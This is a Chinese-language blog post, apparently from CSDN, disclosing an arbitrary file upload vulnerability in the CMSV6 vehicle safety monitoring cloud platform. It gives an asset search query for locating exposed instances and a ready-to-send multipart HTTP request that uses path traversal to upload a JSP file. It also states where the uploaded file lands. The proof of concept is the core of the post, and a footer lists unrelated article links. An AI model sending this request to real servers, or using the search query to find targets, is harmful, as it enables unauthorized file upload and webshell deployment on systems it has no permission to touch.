首页 > 其他分享 >鸿运(通天星CMSV6车载)主动安全监控云平台inspect_file/upload存在任意文件上传漏洞

鸿运(通天星CMSV6车载)主动安全监控云平台inspect_file/upload存在任意文件上传漏洞

时间:2024-04-05 13:30:30浏览次数:27  
标签:-- inspect upload Content CMSV6 file 安全监控

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

鸿运(通天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。

漏洞描述

鸿运(通天星CMSV6车载)主动安全监控云平台存在inspect_file/upload存在任意文件上传漏洞

 资产搜索

body="./open/webApi.html" || body="/808gps/"

漏洞复现

POST /inspect_file/upload HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 219
Content-Type: multipart/form-data; boundary=2e7688d712bcc913201f327059f9976b

--2e7688d712bcc913201f327059f9976b
Content-Disposition: form-data; name="uploadFile"; filename="../ceshi.jsp"
Content-Type: application/octet-stream

<% out.println("ceshi"); %>
--2e7688d712bcc913201f327059f9976b--

上传路径:

http://127.0.0.1/upload/software/13201203286126400_ceshi.jsp

标签:--,inspect,upload,Content,CMSV6,file,安全监控
From: https://blog.csdn.net/wan___she__pi/article/details/137373231

相关文章

  • QFileDialog自定义样式设置SetStytlesheet
     voidQStockView::SlotOutputExcel(){ QFileDialogfileDilog; fileDilog.setOption(QFileDialog::DontUseNativeDialog,true); constQStringg_FileDialogQSS= ".QFileDialog" "{......
  • Linux项目自动化构建工具 --- make/Makefile
    文章目录make/Makefile文件1背景2理解2.1创建执行代码2.2创建makefile文件2.3运行make指令2.3.1依赖关系2.3.2依赖方法2.3.3原理2.4项目清理make/Makefile文件1背景会不会写makefile,从一个侧面说明了一个人是否具备完成大型工程的能力一个工程中的源文......
  • linux 挂载错误 mount: unknown filesystem type LVM2_member 解决方法
    解决办法:需要安装lvm2: sudoaptinstalllvm2然后按一下步骤:1、查看物理卷:pvssudopvs得到类似如下结果: PVVGFmtAttrPSizePFree /dev/sdbVolGroup00lvm2a--18.19t02、查看卷组:vgssudovgs得到类似如下结果:  VG    #PV#LV#......
  • Linux启动报错:clean ... file ... blocks 或 recovering journal
    先说原因:根目录内存满了如何解决:首先进入命令行界面:按照网上的操作方法主要是这种:Ctrl+Alt+F4我不是这种方式进入的,我的是:Alt+F4进入之后会让你输入账号密码,但是我只有四秒钟时间输入(不知道怎么会有这种逆天设置),很难一次搞定,极其麻烦。而且可能出现密码太长输不完的情......
  • 【问题记录】CCES编译报错:“[Error li1030] Can not open input file ‘libadi_sigma
    一,问题现象编译工程时,报错提示:“[Errorli1030]Cannotopeninputfile‘libadi_sigma_sharc_awc.dlb’”,“[Errorli1030]Cannotopeninputfile‘libadi_sigma_sharc_nwc.dlb’”:二,问题原因&解决方法没有安装对应的插件,安装插件:SigmaStudioForSHARC-SH-Rel2.......
  • 文件对话框OpenFileDialog和SaveFileDialog
    文件对话框常用属性表:属性名功能说明InitialDirectory对话框的初始目录Filter文件筛选器,按"显示名称|类型"格式编写例如,“文本文件(.txt)|.txt|所有文件(.)||.”FilterIndex在对话框中选择的文件筛选器的索引,如果选第一项就设为1FileName第一个在对话框中显示的文件或最......
  • C#中Directory.GetFiles() 函数的使用方法(读取目录中的文件)
    原文链接:https://blog.csdn.net/qq_35970739/article/details/82887314C#中Directory.GetFiles(string path ,stringsearchPattern,SearchOptionsearchOption )获取path目录中所有文件一、参数1、path要搜索的目录的相对或绝对路径。此字符串不区分大小写。2、sear......
  • Android文件管理器选择文件,获得文件路径URI转File
     前情描述:使用系统文件管理器,选择指定文件类型上传。基础知识MIME调起文件管理器指定浏览位置(路径转URI)设置多种文件类型URI转路径1.MIMEMIME(MultipurposeInternetMailExtensions)是描述消息内容类型的因特网标准。finalStringDOC="application/mswo......
  • docker构建镜像——Dockerfile
    COPY格式COPY[--chown=<用户>:<组>]<源>...<目的>COPY[--chown=<用户>:<组>]["<源>"..."<目的>"]案例[root@hmm~]#mkdiryum3-centos[root@hmm~]#lsanaconda-ks.cfgdocker-hellohello.csize......
  • MySQL数据库报错:Can‘t create/write to file ‘/tmp/ibXXX‘ (Errcode: 13 - Permiss
    在进行MySQL数据库的安装和配置过程中,用户有时会遇到各种错误信息,这些错误可能会阻碍安装过程或初次运行。理解和解决这些错误对于确保数据库平稳运行至关重要。本文旨在探讨MySQL安装过程中可能出现的一个特定错误,提供关于该错误的详细信息、可能的原因及相应的解决方案。......